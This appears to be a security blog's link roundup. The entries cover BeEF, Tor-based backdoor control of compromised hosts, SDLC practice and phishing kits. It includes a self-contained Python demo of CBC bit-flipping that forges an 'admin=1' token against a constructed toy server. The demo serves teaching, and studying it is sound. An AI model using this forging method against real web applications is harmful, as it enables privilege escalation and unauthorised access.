Recent Readings on BeEF, MetasploiTor, Automation, SDLCs, Phishingggggggg
First off the bat are a couple of posts I've had direct (some would say intimate) involvement in.
BeEF QR Fun - Summarising some of the salient points from my OWASP AppSecAPAC 2012 presentation (Shake Hooves with BeEF), I finally pulled my finger out and posted for the BeEF blog. Mainly focusing on custom mount points in BeEF with iFrame target-site impersonation, plus a dabbling of QR-codedness, the post hopes to demonstrate a few different methods to fit BeEF into your social engineering methodology.
Anonymous Post-Compromise Control via Tor Hidden Services - My colleague Dave somehow managed to wrangle up an opus on utilising Tor to anonymise backdoor connectivity to compromised hosts over the Christmas period. Knowing Dave's relationship with beer I'm surprised that he still had the brain power to push this out (:P). If you have any interest in Metasploit and Tor then you should check out his post.
And now onto other security stuff..
Minion - Automating Security for Developers - There are a few different open source security automation projects going on at the moment (I mentioned Codesake recently), but this one looks pretty interesting. It seems fairly modular (it currently appears to interface with ZAP, Skipfish and Garmr). The demo video looks really interesting, very point and click. For developers, this may be an ideal step in their SDLC to catch bugs sooner.
Red October - There's been quite a bit of noise about this attack recently. This was one of the first blog posts I read that seemed to provide a clear summary, with further links into the Kaspersky reports. This long-term campaign has apparently been targeting embassies and other governmental agencies (including defence) for the past 5 years.
Non-Negotiable Elements of a Secure Software Development Process: Part 2 - Nick Coblentz has been posting these great articles on elements of a secure systems or software development lifecycle which are non-negotiable. Part 1 started with security requirements, while this post is focused on security architecture, configuration and other patterns. If you're working on embedding security into your development lifecycle definitely keep in the loop on Nick's posts.
Man-in-the-Middle Attacks Against Browser Encryption - Schneier recently posted a summary of how Nokia are intercepting HTTPS channels to offer better data transmission speeds over slower networks through compression and other means. This is really similar to a 2009 post of mine talking about how Opera Mini was doing the same thing.
Defeating AES Without a PhD - Dan Crowley writes up an excellent post on leveraging some of Burp's trickier Intruder settings to understand (and attack) encrypted parameters within web apps. (Dan's a great guy, was happy to have a few beers with him while he was down in Sydney last year).
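As an added example (not code from Dan's post, and not Burp's), here is the manipulation that Intruder's "bit flipper" payload type automates against an encrypted parameter: CBC bit flipping. A small Feistel network stands in for AES, because what makes the attack work is the mode, not the block cipher. The token layout "admin=0&user=guest", the server key, the fixed IV and the server's k=v&k=v parser are all constructed for the demo; the attacker is assumed to know nothing but the token and a guess at its layout.

```python
"""CBC bit flipping against an encrypted web parameter (added example).

A toy Feistel cipher stands in for AES: CBC malleability does not depend on
the cipher. KEY, IV, the token layout and the parser are constructed here.
"""
import hashlib
import hmac

BLOCK = 16                                   # block size in bytes, as for AES
ROUNDS = 8
KEY = b"server-secret-key-32-bytes-long!"   # constructed; never known to the attacker
IV = bytes(range(BLOCK))                     # constructed; a real server would randomise it


class PaddingError(ValueError):
    pass


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key: bytes, rnd: int, half: bytes) -> bytes:
    """Keyed round function: HMAC-SHA256 truncated to half a block."""
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[: BLOCK // 2]


def block_encrypt(key: bytes, blk: bytes) -> bytes:
    """Toy 128-bit block cipher (balanced Feistel). Stand-in for AES only."""
    l, r = blk[:8], blk[8:]
    for i in range(ROUNDS):
        l, r = r, _xor(l, _f(key, i, r))
    return l + r


def block_decrypt(key: bytes, blk: bytes) -> bytes:
    l, r = blk[:8], blk[8:]
    for i in reversed(range(ROUNDS)):
        l, r = _xor(r, _f(key, i, l)), l
    return l + r


def pkcs7_pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def pkcs7_unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise PaddingError("bad padding")
    return data[:-n]


def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Returns iv || ciphertext, the usual shape of an encrypted cookie or parameter."""
    out, prev = [iv], iv
    padded = pkcs7_pad(plaintext)
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key: bytes, token: bytes) -> bytes:
    blocks = [token[i:i + BLOCK] for i in range(0, len(token), BLOCK)]
    pt = b"".join(_xor(block_decrypt(key, c), p) for p, c in zip(blocks, blocks[1:]))
    return pkcs7_unpad(pt)


def server_parse(token: bytes):
    """The 'application': decrypt, then parse k=v&k=v. Returns a dict or an error label."""
    try:
        pt = cbc_decrypt(KEY, token).decode("ascii")
        return dict(kv.split("=", 1) for kv in pt.split("&"))
    except PaddingError:
        return "padding error"
    except ValueError:          # UnicodeDecodeError and a segment with no '='
        return "parse error"


def flip(token: bytes, offset: int, delta: int) -> bytes:
    """XOR one ciphertext byte. CBC applies the same XOR to plaintext byte `offset`
    and scrambles the preceding plaintext block, unless `offset` lies in the IV."""
    t = bytearray(token)
    t[offset] ^= delta
    return bytes(t)


def bit_flip_sweep(token: bytes, oracle) -> list:
    """What Intruder's bit flipper does: flip the low bit of every byte and record the
    reaction. IV positions that yield a parse error are delimiters in the plaintext;
    the rest of the first block is value bytes the attacker can rewrite cleanly."""
    results = []
    for off in range(len(token)):
        r = oracle(flip(token, off, 0x01))
        results.append("ok" if isinstance(r, dict) else r)
    return results


def forge(token: bytes, layout: str, field: str, old: str, new: str) -> bytes:
    """Guess the plaintext layout, locate the byte to change, XOR in the difference."""
    off = layout.index(field + "=" + old) + len(field) + 1
    return flip(token, off, ord(old) ^ ord(new))


def demo():
    token = cbc_encrypt(KEY, IV, b"admin=0&user=guest")   # what the server issues
    guessed_layout = "admin=0&user=guest"                 # attacker's guess from context
    forged = forge(token, guessed_layout, "admin", "0", "1")
    return server_parse(token), server_parse(forged), bit_flip_sweep(token, server_parse)
```

Because "admin=0" sits in the first plaintext block, its value byte is masked only by the IV, so flipping a single IV byte changes '0' to '1' with no collateral damage. The sweep shows why the same trick is messier further in: flipping bytes of a later ciphertext block scrambles the block before it and usually trips padding or parsing, which is exactly the response pattern you read off Intruder's results table to map where the delimiters and values live.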
Bouncer's Laser Precision Phishing - RSA have posted an article on a particular phishing kit (i.e. a pre-canned tool used to create or deploy phishing sites) which utilises a unique URL for each recipient (so this kit includes the email/spam component too) to ensure that the site is only accessible (at least initially) by the intended victim. I'm sure there are ways to bypass this, but it certainly may fool some simple phishing detection tools (such as those used by finance or other sectors when they analyse abuse mailboxes, email bounce-backs etc.).
Okay, enough with the security stuff .. (Fine! .. here's one article..)
Monkey Island Insult Swordfighter in your Browser - for those fans of the original Monkey Island point and click adventure games you should check this out! This guy has dumped in browser form a collection of the sword-fighting challenges..